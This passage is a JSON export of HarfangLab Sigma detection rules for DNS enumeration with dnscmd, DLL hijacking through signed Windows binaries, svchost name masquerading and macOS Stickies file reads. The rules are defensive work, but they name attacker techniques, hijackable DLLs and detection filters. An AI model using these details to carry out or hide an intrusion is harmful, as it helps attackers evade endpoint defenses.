"content": "title: DNS Records Discovered via dnscmd.exe\nid: e6bfc159-5271-4835-a319-0f1d4cea23c7\ndescription: |\n Detects the usage of dnscmd.exe to enumerate domain DNS entries.\n Attackers may leverage dnscmd.exe to gather information about DNS entries of a domain and thus identify new potential targets.\n It is recommended to investigate actions made by the parent process to identify other potentially malicious commands and to correlate this alert with other discovery actions.\nreferences:\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\n - https://attack.mitre.org/techniques/T1018/\ndate: 2023/12/27\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'dnscmd.exe'\n CommandLine|contains:\n - ' ?enumrecords'\n - ' ?enumzones'\n - ' ?ZonePrint'\n - ' ?info'\n filter_bestpractice:\n ParentImage:\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n CurrentDirectory: '?:\\Windows\\System32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\DNSServer\\'\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6bfc159-5271-4835-a319-0f1d4cea23c7",
"rule_name": "DNS Records Discovered via dnscmd.exe",
"rule_description": "Detects the usage of dnscmd.exe to enumerate domain DNS entries.\nAttackers may leverage dnscmd.exe to gather information about DNS entries of a domain and thus identify new potential targets.\nIt is recommended to investigate actions made by the parent process to identify other potentially malicious commands and to correlate this alert with other discovery actions.\n",
"rule_creation_date": "2023-12-27",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6dc15a6-39f5-4581-ad25-f3bb74d6d2cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083898Z",
"creation_date": "2026-03-23T11:45:34.083900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083904Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ktmutil.yml",
"content": "title: DLL Hijacking via ktmutil.exe\nid: e6dc15a6-39f5-4581-ad25-f3bb74d6d2cf\ndescription: |\n Detects potential Windows DLL Hijacking via ktmutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ktmutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ktmw32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6dc15a6-39f5-4581-ad25-f3bb74d6d2cf",
"rule_name": "DLL Hijacking via ktmutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ktmutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6ee37ea-dabe-45dc-a61c-150a5c09ecf8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092751Z",
"creation_date": "2026-03-23T11:45:34.092753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092757Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmclient.yml",
"content": "title: DLL Hijacking via dmclient.exe\nid: e6ee37ea-dabe-45dc-a61c-150a5c09ecf8\ndescription: |\n Detects potential Windows DLL Hijacking via dmclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCfgUtils.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmenterprisediagnostics.dll'\n - '\\dmiso8601utils.dll'\n - '\\DMOleAutUtils.dll'\n - '\\dmxmlhelputils.dll'\n - '\\IPHLPAPI.DLL'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6ee37ea-dabe-45dc-a61c-150a5c09ecf8",
"rule_name": "DLL Hijacking via dmclient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e732dcfa-139d-4903-840c-b11bb78094be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594566Z",
"creation_date": "2026-03-23T11:45:34.594569Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594577Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applytrustoffline.yml",
"content": "title: DLL Hijacking via applytrustoffline.exe\nid: e732dcfa-139d-4903-840c-b11bb78094be\ndescription: |\n Detects potential Windows DLL Hijacking via applytrustoffline.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'applytrustoffline.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\mintdh.dll'\n - '\\StateRepository.Core.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e732dcfa-139d-4903-840c-b11bb78094be",
"rule_name": "DLL Hijacking via applytrustoffline.exe",
"rule_description": "Detects potential Windows DLL Hijacking via applytrustoffline.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e7ed7279-d5a1-4748-9cc6-1d86495d6221",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070587Z",
"creation_date": "2026-03-23T11:45:34.070589Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070594Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/",
"https://redcanary.com/blog/threat-detection/process-masquerading/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_svchost_masquerading.yml",
"content": "title: Binary Masquerading as svchost.exe\nid: e7ed7279-d5a1-4748-9cc6-1d86495d6221\ndescription: |\n Detects an executed process whose name is similar to svchost.exe.\n Adversaries may approximate the name of svchost binary in order to evade detection and analysis.\n It is recommended to check the legitimacy of the process by analyzing its behavior and correlating with other alerts on the endpoint.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\n - https://redcanary.com/blog/threat-detection/process-masquerading/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/10/02\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessName:\n - 'svhost.exe'\n - 'scvhost.exe'\n - 'svchosst.exe'\n - 'svehost.exe'\n - 'svchast.exe'\n - 'svchos.exe'\n - 'schost.exe'\n - 'svchostt.exe'\n - 'svvhost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e7ed7279-d5a1-4748-9cc6-1d86495d6221",
"rule_name": "Binary Masquerading as svchost.exe",
"rule_description": "Detects an executed process whose name is similar to svchost.exe.\nAdversaries may approximate the name of svchost binary in order to evade detection and analysis.\nIt is recommended to check the legitimacy of the process by analyzing its behavior and correlating with other alerts on the endpoint.\n",
"rule_creation_date": "2024-10-02",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e7f19118-d344-433f-ab0a-2ba59a7576aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618601Z",
"creation_date": "2026-03-23T11:45:34.618603Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618607Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_stickies.yml",
"content": "title: Suspicious Read Access to Stickies Files\nid: e7f19118-d344-433f-ab0a-2ba59a7576aa\ndescription: |\n Detects a process reading sensitive files related to the Stickies application.\n Adversaries may target user sticky notes on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Containers/com.apple.Stickies/Data/Library/Stickies/'\n ProcessImage|contains: '?'\n\n filter_stickies:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.Stickies'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_security_tools:\n Image:\n - /Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n - '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n - '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n - '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n - '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n - '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n - '/Library/Application Support/PaloAltoNetworks/Traps/bin/pmd'\n\n ### backup sofware ###\n exclusion_backup:\n Image:\n - '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n - '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_checkpoint:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'cpard'\n - 'com.checkpoint.am.app'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e7f19118-d344-433f-ab0a-2ba59a7576aa",
"rule_name": "Suspicious Read Access to Stickies Files",
"rule_description": "Detects a process reading sensitive files related to the Stickies application.\nAdversaries may target user sticky notes on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e810a8d7-5996-42a2-9fb8-44861142fdb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595232Z",
"creation_date": "2026-03-23T11:45:34.595235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595243Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesdataexecutionprevention.yml",
"content": "title: DLL Hijacking via systempropertiesdataexecutionprevention.exe\nid: e810a8d7-5996-42a2-9fb8-44861142fdb2\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesdataexecutionprevention.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesdataexecutionprevention.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e810a8d7-5996-42a2-9fb8-44861142fdb2",
"rule_name": "DLL Hijacking via systempropertiesdataexecutionprevention.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesdataexecutionprevention.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e83d7b78-1e43-40d7-8800-306e1ec12054",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098099Z",
"creation_date": "2026-03-23T11:45:34.098102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098109Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfsutil.yml",
